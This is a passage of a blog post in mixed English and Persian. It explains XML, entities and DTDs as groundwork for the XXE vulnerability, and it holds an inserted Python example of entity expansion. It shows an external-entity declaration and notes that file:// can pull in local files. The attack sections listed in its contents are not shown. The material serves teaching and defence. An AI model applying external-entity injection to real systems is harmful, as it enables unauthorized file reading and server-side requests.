{"id":11057,"date":"2021-05-19T18:01:26","date_gmt":"2021-05-19T13:31:26","guid":{"rendered":"https:\/\/liangroup.net\/blog\/?p=11057"},"modified":"2022-02-05T15:31:43","modified_gmt":"2022-02-05T12:01:43","slug":"what-is-xxe","status":"publish","type":"post","link":"https:\/\/liangroup.net\/blog\/what-is-xxe\/","title":{"rendered":"What is XML, and how does the XXE vulnerability arise?"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"11057\" class=\"elementor elementor-11057\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c3ede4b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c3ede4b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-12c4052\" data-id=\"12c4052\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-de8e761 elementor-widget elementor-widget-text-editor\" data-id=\"de8e761\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>In this article we get to know the <em><strong>XXE <a 
href=\"https:\/\/liangroup.net\/blog\/what-is-vulnerability\/\">vulnerability<\/a><\/strong><\/em> through a practical example, with code. XXE, or XML External Entities, appears in the <a href=\"https:\/\/academy.liangroup.net\/training-course\/owasp-web-application\"><strong>OWASP Top 10<\/strong><\/a> list of web application risks (fourth place, A4, in the 2017 edition; the 2021 edition folds it into Security Misconfiguration), and XXE injection is a significant class of web attacks. To understand the vulnerability properly, though, we first need a short introduction to XML documents and answers to these questions:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-20d8b5d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"20d8b5d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container 
elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-80278cf\" data-id=\"80278cf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ec5b969 elementor-widget elementor-widget-text-editor\" data-id=\"ec5b969\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<span style=\"font-size: 11pt; color: #000000;\"><strong>What is XML? What is an XML entity? What is a DTD? What is a custom entity? What is an external entity?<\/strong><\/span>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-93dd0f0 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"93dd0f0\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-11749e1\" data-id=\"11749e1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5a3fa3b elementor-widget elementor-widget-text-editor\" data-id=\"5a3fa3b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Below, 
we first go over these concepts and then explain what the <strong>XXE vulnerability is<\/strong>, how an <strong>XXE Injection attack<\/strong> is carried out, and how the XXE vulnerability can be prevented. If you are already familiar with the concepts above, you can skip them.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4e57738 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4e57738\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a7b4729\" data-id=\"a7b4729\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cf69484 elementor-widget elementor-widget-text-editor\" 
data-id=\"cf69484\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<ul><li><a href=\"#xml-entities\"><strong>Part One: XML Entities<\/strong><\/a><ul><li><a href=\"#whats-xml\"><strong>What is XML?<\/strong><\/a><\/li><li><a href=\"#entity-in-xml\"><strong>What does Entity mean in XML?<\/strong><\/a><\/li><li><a href=\"#dtd\"><strong>What is a DTD, or Document Type Definition?<\/strong><\/a><\/li><li><a href=\"#custom-entity\"><strong>What is a Custom Entity and how is it defined?<\/strong><\/a><\/li><li><a href=\"#ext-entity\"><strong>What is an External Entity?<\/strong><\/a><\/li><\/ul><\/li><li><a href=\"#ext-entity-injection\"><strong>Part Two: XXE Injection, or injection of external entities<\/strong><\/a><ul><li><a href=\"#xxe-injection\"><strong>What is the XXE injection vulnerability?<\/strong><\/a><\/li><li><a 
href=\"#occurance\"><strong>How does the XXE vulnerability arise?<\/strong><\/a><\/li><li><a href=\"#types\"><strong>What are the types of XXE attacks?<\/strong><\/a><ul><li><a href=\"#file-retrieval\"><strong>Exploiting XXE to retrieve files<\/strong><\/a><\/li><li><a href=\"#ssrf\"><strong>Exploiting XXE to perform SSRF attacks<\/strong><\/a><\/li><\/ul><\/li><li><a href=\"#blind-xxe\"><strong>The Blind XXE vulnerability<\/strong><\/a><ul><li><a href=\"#whats-blind-xxe\"><strong>What is Blind XXE?<\/strong><\/a><\/li><li><a href=\"#oast\"><strong>Detecting Blind XXE with OAST (out-of-band) techniques<\/strong><\/a><ul><li><a href=\"#oast-file-retrieval\"><strong>Exploiting Blind XXE to exfiltrate data 
out-of-band<\/strong><\/a><\/li><li><a href=\"#err-msg\"><strong>Exploiting Blind XXE to retrieve data via error messages<\/strong><\/a><\/li><li><a href=\"#local-dtd\"><strong>Exploiting Blind XXE by repurposing a local DTD<\/strong><\/a><ul><li><a href=\"#find-local-dtd\"><strong>Finding an existing DTD file to repurpose<\/strong><\/a><\/li><\/ul><\/li><\/ul><\/li><li><a href=\"#attack-surface\"><strong>How to find assets prone to XXE injection<\/strong><\/a><ul><li><a href=\"#xinclude\"><strong>XInclude attacks<\/strong><\/a><\/li><li><a href=\"#file-upload\"><strong>XXE attacks via file upload<\/strong><\/a><\/li><li><a href=\"#content-format\"><strong>XXE attacks via changing the content 
type<\/strong><\/a><\/li><\/ul><\/li><\/ul><\/li><li><a href=\"#find-xxes\"><strong>How to find XXE vulnerabilities (testing for XXE)<\/strong><\/a><\/li><li><a href=\"#prevent-xxes\"><strong>How to prevent XXE vulnerabilities<\/strong><\/a><\/li><\/ul><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8cc3b64 elementor-widget elementor-widget-html\" data-id=\"8cc3b64\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div id=\"1793944692\"><a href=\"https:\/\/www.aparat.com\/embed\/fqpdF\">Video: webinar on XXE attacks, by Koosha Zanjani (Aparat)<\/a><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ac4db64 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ac4db64\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element 
elementor-element-ca26801\" data-id=\"ca26801\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0289992 elementor-widget elementor-widget-text-editor\" data-id=\"0289992\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"xml-entities\">XML Entities<\/h2>\nSince the XXE vulnerability, and the attacks that exploit it, work through XML entities, we first need to know what these entities are; the sections that follow explain in detail what an XML entity is.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-7b11303\" data-id=\"7b11303\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e8e3f6b elementor-widget elementor-widget-image\" data-id=\"e8e3f6b\" 
data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail wp-image-11099\" alt=\"what is xml\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min-150x150.jpg 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xml-min.jpg 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-adc81b2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"adc81b2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b33870f\" data-id=\"b33870f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc08f3c elementor-widget elementor-widget-text-editor\" data-id=\"fc08f3c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"whats-xml\">What is XML?<\/h2>\nXML stands for \u00abExtensible Markup Language\u00bb and, as 
its name says, it is a markup language, like HTML. XML was designed for storing and transporting data (unlike HTML, which was designed for displaying it). Like HTML, XML uses a tree structure built from tags and the data between them. 
One major difference from HTML is that XML has no predefined tags, so you can name each tag after the data it holds. In the early days of the web, XML was a very popular data-interchange format (the X in AJAX stands for XML), 
but JSON has gradually taken over that role.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-97a63e5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"97a63e5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d487a48\" data-id=\"d487a48\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-67285c4 elementor-widget elementor-widget-text-editor\" data-id=\"67285c4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"entity-in-xml\"><span style=\"font-size: 14pt;\">What does Entity mean in XML?<\/span><\/h3>\nXML entities let us put a named placeholder in the XML document that stands for a piece of data, instead of writing the data itself. 
XML itself predefines five such entities: &amp;lt;, &amp;gt;, &amp;amp;, &amp;apos; and &amp;quot;. For example, &amp;lt; and &amp;gt; stand for the &lt; and &gt; characters. These characters, the so-called \u00abmetacharacters*\u00bb, open and close XML tags, so if we want them to appear inside our own data we have to write them as those entities (a bare &lt; or &amp; in element content makes the document ill-formed, and a conforming parser rejects it).\n<strong>* Characters that have a special meaning in a particular language.<\/strong>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section 
elementor-element elementor-element-9a13426 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9a13426\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-98a08eb\" data-id=\"98a08eb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ac1f4a9 elementor-widget elementor-widget-text-editor\" data-id=\"ac1f4a9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"dtd\"><span style=\"font-size: 14pt;\">What is a DTD, or Document Type Definition?<\/span><\/h3>\nDTD stands for Document Type Definition. It holds the declarations that describe an XML document: its structure, the kinds of content its elements may hold, and other items such as entities. 
The DTD is given in the optional DOCTYPE declaration at the start of the XML document. It can sit entirely inside the document (an internal DTD), be loaded from somewhere else (an external DTD), or combine the two. The second option is the one that matters for security: an external DTD, like an external entity, makes the parser fetch another resource by URI, and that is the behaviour the XXE sections below build on.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-7e5edaf\" data-id=\"7e5edaf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4639332 elementor-widget elementor-widget-image\" data-id=\"4639332\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"512\" height=\"512\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes.jpg\" class=\"attachment-large size-large wp-image-11106\" alt=\"document type definition\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes.jpg 512w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes-300x300.jpg 300w, 
https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes-150x150.jpg 150w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-efccd23 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"efccd23\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3fd0bc5\" data-id=\"3fd0bc5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ea27cc7 elementor-widget elementor-widget-text-editor\" data-id=\"ea27cc7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"custom-entity\"><span style=\"font-size: 12pt;\"><strong>What is a Custom Entity and how is it defined?<\/strong><\/span><\/h3>\nXML lets you declare new, custom entities of your own inside the DTD. 
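To make the entity and DTD sections above concrete before the one-line declaration that follows, here is a worked example added by the editor; it is not code from the original article. It uses only Python's standard-library parser (expat, behind xml.etree.ElementTree). The document it parses is constructed for the example: its internal DTD describes the document's structure with ELEMENT declarations and declares a custom general entity, and the body references that entity and uses the built-in &amp;lt;, &amp;gt; and &amp;amp; entities for the metacharacters. Parsing it shows the custom entity expanded in place, shows how raw text is turned into entity-escaped XML text, and shows that a reference to an entity the DTD never declared is rejected rather than guessed. The names SAMPLE_XML, parse_and_expand, to_xml_text and undefined_entity_is_rejected are this example's own.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed sample document (not taken from the article). The internal DTD
# inside the DOCTYPE declaration both describes the structure (ELEMENT
# declarations) and declares a custom general entity named "myentity".
# The body references that entity and uses the predefined entities for the
# metacharacters < > & so that they are data, not markup.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (greeting, raw)>
  <!ELEMENT greeting (#PCDATA)>
  <!ELEMENT raw (#PCDATA)>
  <!ENTITY myentity "my entity value">
]>
<note>
  <greeting>Value: &myentity;</greeting>
  <raw>1 &lt; 2 &amp;&amp; 3 &gt; 2</raw>
</note>
"""


def parse_and_expand(xml_text: str) -> dict:
    """Parse the document and return {child tag: child text} for the root.

    expat substitutes internal entities while parsing, so the returned
    strings hold the expanded values, not the &name; references that were
    written in the document.
    """
    root = ET.fromstring(xml_text)
    return {child.tag: child.text for child in root}


def to_xml_text(data: str) -> str:
    """Turn raw data into text that is safe inside an element: the
    metacharacters &, < and > become the predefined entities."""
    return escape(data)


def undefined_entity_is_rejected(xml_text: str) -> bool:
    """A reference to an entity that no DTD declared is a well-formedness
    error; the parser refuses the document instead of inventing a value."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return True
    return False


if __name__ == "__main__":
    print(parse_and_expand(SAMPLE_XML))
    print(to_xml_text("<b>1 < 2</b> & more"))
    print(undefined_entity_is_rejected("<a>&nosuchentity;</a>"))
```

Run the file directly to print the three results. Note that expat is a non-validating parser: the ELEMENT declarations are read but not enforced, so a document that violates the declared structure still parses; enforcing a DTD needs a validating parser such as lxml's DTD class. The expansion itself is the point: the parser replaces the reference with whatever the declaration says, and the declaration is part of the input.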
For example:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e5d3c29 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e5d3c29\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d84350c\" data-id=\"d84350c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5f25bcc elementor-widget elementor-widget-text-editor\" data-id=\"5f25bcc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code>&lt;!DOCTYPE foo [ &lt;!ENTITY myentity &quot;my entity value&quot; &gt; ]&gt;<\/code><\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-374f994 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"374f994\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fc183ff\" 
data-id=\"fc183ff\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f8c56c6 elementor-widget elementor-widget-text-editor\" data-id=\"f8c56c6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\u062a\u0639\u0631\u06cc\u0641 \u0628\u0627\u0644\u0627 \u06cc\u0639\u0646\u06cc \u0647\u0631\u062c\u0627\u06cc\u06cc \u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u062f XML \u0628\u0647 &amp;myentity \u0627\u0631\u062c\u0627\u0639 \u062f\u0647\u06cc\u0645\u060c \u0628\u0627 \u0645\u0642\u062f\u0627\u0631 \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647\u200c\u06cc \u00ab my entity value \u00bb (\u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u06cc\u06a9 \u0627\u0633\u062a\u0631\u06cc\u0646\u06af \u0627\u0633\u062a) \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\n\u0628\u0647 \u0637\u0648\u0631 \u062e\u06cc\u0644\u06cc \u0633\u0627\u062f\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0641\u062a \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627 \u062f\u0631 XML\u060c \u00ab\u0634\u0628\u06cc\u0647 \u0628\u0647\u00bb \u0645\u062a\u063a\u06cc\u0631\u0647\u0627 \u062f\u0631 \u0632\u0628\u0627\u0646\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0646\u0648\u06cc\u0633\u06cc \u062f\u06cc\u06af\u0631 \u0647\u0633\u062a\u0646\u062f\u060c \u0648 \u0645\u0642\u0627\u062f\u06cc\u0631 \u0645\u062e\u062a\u0644\u0641 \u0631\u0627 \u062f\u0631 \u062e\u0648\u062f \u0646\u06af\u0647 \u0645\u06cc\u200c\u062f\u0627\u0631\u0646\u062f\u060c \u06af\u0631\u0686\u0647 \u0646\u0628\u0627\u06cc\u062f \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0627 \u0645\u062a\u063a\u06cc\u0631 \u0627\u0634\u062a\u0628\u0627\u0647 
\u06af\u0631\u0641\u062a.\n<h3 id=\"ext-entity\"><span style=\"font-size: 12pt;\">External Entity \u06cc\u0627 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u0686\u06cc\u0633\u062a\u061f<\/span><\/h3>\n\u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u06cc\u0627 External Entities \u062f\u0631 \u0632\u0628\u0627\u0646 XML \u0646\u0648\u0639\u06cc \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u0634\u062e\u0635\u06cc\u200c\u0633\u0627\u0632\u06cc\u200c\u0634\u062f\u0647 \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u062e\u0627\u0631\u062c \u0627\u0632 DTD \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f.\u0628\u0631\u0627\u06cc \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 External Entity \u0628\u0627\u06cc\u062f \u0627\u0632 \u06a9\u0644\u06cc\u062f\u0648\u0627\u0698\u0647 SYSTEM \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f \u0648 \u0647\u0645\u06cc\u0646\u200c\u0637\u0648\u0631 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0644\u06cc\u0646\u06a9 \u0631\u0627 \u0645\u0634\u062e\u0635 \u06a9\u0631\u062f \u06a9\u0647 \u0645\u0642\u062f\u0627\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u0634\u0648\u062f. 
For example:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ad7ef7c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ad7ef7c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-937a4e1\" data-id=\"937a4e1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a695a73 elementor-widget elementor-widget-text-editor\" data-id=\"a695a73\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM &quot;http:\/\/normal-website.com&quot; &gt; ]&gt;<\/code><\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ab6a7e4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ab6a7e4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element 
elementor-element-e62b9cb\" data-id=\"e62b9cb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-29cd7cc elementor-widget elementor-widget-text-editor\" data-id=\"29cd7cc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>This means that wherever the data inside the document references &amp;ext;, a request is sent to normal-website.com, the content read from that address is parsed, and the result is substituted in place of &amp;ext;. The file:\/\/ protocol can also be used in this link, so that the External Entity is loaded locally from a file. 
